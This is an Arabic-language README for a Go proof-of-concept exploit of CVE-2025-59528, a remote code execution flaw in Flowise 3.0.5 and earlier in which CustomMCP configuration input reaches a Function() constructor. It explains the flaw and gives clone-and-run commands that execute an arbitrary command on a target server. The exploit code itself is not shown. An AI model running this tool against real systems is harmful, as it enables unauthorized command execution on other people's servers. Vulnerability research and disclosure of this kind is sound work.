
استغلال إثبات المفهوم بلغة Go لثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) في Flowise CustomMCP CVE-2025-59528
إثبات مفهوم مكتوب بلغة Go لـ CVE-2025-59528 يستهدف إصدارات Flowise <= 3.0.5.
يسمح Flowise بتنفيذ JavaScript غير مُتحقق منه عبر إعداد عقدة CustomMCP. يمرر التطبيق المدخلات التي يقدمها المستخدم داخل معامل mcpServerConfig مباشرةً إلى مُنشئ Function() داخل الدالة الخلفية convertToValidJSONString. وهذا يؤدي إلى تقييم الكود بصلاحيات Node.js كاملة، مما يسمح بتنفيذ أوامر نظام عشوائية عبر child_process.
git clone https://github.com/Moon-Harvest/CVE-2025-59528
cd CVE-2025-59528/
go run main.go <target-base-url> <api-key> <command>
go run main.go http://target.com h3D_9jD7Xzi0V2KSrld9ff4P3rm6cuNXg1uA-wFsUYc "touch /tmp/pwned"